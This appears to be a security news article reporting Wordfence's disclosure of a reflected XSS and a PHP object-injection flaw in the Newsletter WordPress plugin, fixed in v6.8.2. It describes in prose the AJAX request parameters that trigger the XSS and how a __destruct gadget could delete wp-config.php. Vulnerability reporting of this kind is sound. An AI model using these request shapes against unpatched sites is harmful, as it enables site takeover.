Newsletter WordPress Plugin Opens Door to Site Takeover

Newsletter WordPress Plugin Opens Door to Site Takeover

An XSS bug and a PHP object-injection vulnerability are present in a plugin used by hundreds of thousands of websites.

An XSS bug and a PHP object-injection vulnerability are present in a plugin used by hundreds of thousands of websites.

Newsletter, a WordPress plugin with more than 300,000 installations, has a pair of vulnerabilities that could lead to code-execution and even site takeover.

The Newsletter plugin offers site admins a visual editor that can be used to create newsletters and email campaigns from within WordPress. According to Wordfence, the issues are a reflected cross-site scripting (XSS) vulnerability and a PHP object-injection vulnerability, both of which can be rectified by updating to the latest version of Newsletter, v.6.8.2.

The first bug is an authenticated reflected XSS problem (CVE pending), which is a medium-severity issue ranking 6.5 on the CvSS scale. Successful exploitation could allow logged-in attackers to inject malicious code into a web window.

“Despite the fact that [this type of bug] requires an attacker to trick a victim into performing a specific action (such as clicking a specially crafted link), they can still be used to inject backdoors or add malicious administrative users,” according to Wordfence. “If an attacker tricked a victim into sending a request containing a malicious JavaScript using either of these methods, the malicious JavaScript would be decoded and executed in the victim’s browser.”

According to Wordfence, the specific issue arises because vulnerable versions of Newsletter use an AJAX function, tnpc_render_callback, to display edited blocks based on a set of options sent in the AJAX request. However these options aren’t filtered, but are instead passed directly on to a second function, restore_options_from_request, which displays the blocks using the render_block function, according to the analysis, released Monday.

“As such, it was possible for an attacker to get malicious JavaScript to display in multiple ways,” researchers explained in the post.

For instance, one method of exploitation would be to send a POST request to wp-admin/admin-ajax.php with the action parameter set to tnpc_render, the b parameter set to html and the options parameter set to arbitrary JavaScript, according to Wordfence. Or, the options parameter could be set to an empty array options[]=, and the encoded_options parameter set to a base64-encoded JSON string containing arbitrary JavaScript. In both cases, JavaScript would be rendered in a logged-in user’s browser.

The second bug (the CVE is also pending on this one) is a high-severity PHP object-injection bug, carrying a severity ranking of 7.5 on the CvSS scale. The vulnerability could be used to inject a PHP object that in turn could be processed by code from another plugin or theme, and used to execute arbitrary code, upload files or “any number of other tactics that could lead to site takeover,” the firm warned.

“Although the Newsletter editor did not allow lower-level users to save changes to a given newsletter, the same tnpc_render_callback AJAX function was still accessible to all logged-in users, including subscribers,” according to Wordfence. “This introduced a PHP object-injection vulnerability via the restore_options_from_request function.”

In terms of methods of exploitation, Wordfence researchers explained that the __destruct function is used by many sites to automatically delete files and “clean up” once a pre-defined, legitimate process is completed. An example would be a script on an e-commerce site that calculates product prices, stores a log of that action, and then deletes the log when it’s done.

If this code were running on a site that also contained the PHP object injection vulnerability, an attacker could delete the wp-config.php file containing the WordPress site’s core configuration settings by sending a specially crafted payload.

“The deletion of the wp-config.php file would reset the site and allow an attacker to take over by pointing the site’s new configuration to a remote database under their control,” explained Wordfence.

The researchers added that to be successful, an attacker would need to know which plugins are installed on a given site – which can be uncovered with scanning tools, but which means that the bug would be unlikely to be exploited by an automatic script or in bulk.

WordPress Plugin Bugs Proliferate

WordPress plugins are no strangers to security vulnerabilities, some of which can be critical. For instance, last week just such a bug was found in a WordPress plugin called Comments – wpDiscuz, which is installed on more than 70,000 websites. The flaw gives unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.

Earlier in July, it was discovered that the Adning Advertising plugin for WordPress, a premium plugin with over 8,000 customers, contains a critical remote code-execution vulnerability with the potential to be exploited by unauthenticated attackers.

In May, Page Builder by SiteOrigin, a WordPress plugin with a million active installs that’s used to build websites via a drag-and-drop function, was found to harbor two flaws that could allow full site takeover.

Meanwhile in April, it was revealed that legions of website visitors could be infected with drive-by malware, among other issues, thanks to a CSRF bug in Real-Time Search and Replace.

vulnerabilities web security bug cross site scripting newsletter php object injection plugin security vulnerability wordfence wordpress xss

What is Geek Coin

What is GeekCash, Geek Token

Best Visual Studio Code Themes of 2021

Bootstrap 5 Tutorial - Bootstrap 5 Crash Course for Beginners

Nest.JS Tutorial for Beginners

Hello Vue 3: A First Look at Vue 3 and the Composition API

Post Grid WordPress Plugin Flaws Allow Site Takeovers

Team Showcase, a sister plugin, is also vulnerable to the XSS and PHP object-injection bugs — together they have 66,000 installs.

How to Find Ulimit For user on Linux

Explains how to find ulimit values of currently running process or given user account under Linux using the 'ulimit -a' builtin command.

MEAN Stack Tutorial MongoDB ExpressJS AngularJS NodeJS

MEAN Stack Tutorial MongoDB ExpressJS AngularJS NodeJS - We are going to build a full stack Todo App using the MEAN (MongoDB, ExpressJS, AngularJS and NodeJS). This is the last part of three-post series tutorial.

Stubborn WooCommerce Plugin Bugs Get Third Patch

Users of the Discount Rules for WooCommerce WordPress plugin are urged to apply a third and (hopefully) final patch.

Wormable Apple iCloud Bug Allows Automatic Photo Theft

Ethical hackers so far have earned nearly $300K in payouts from the Apple bug-bounty program for discovering 55 bugs, 11 of them critical, during a three-month hack. The wormable iCloud bug is a cross-site scripting (XSS) issue, according to the writeup.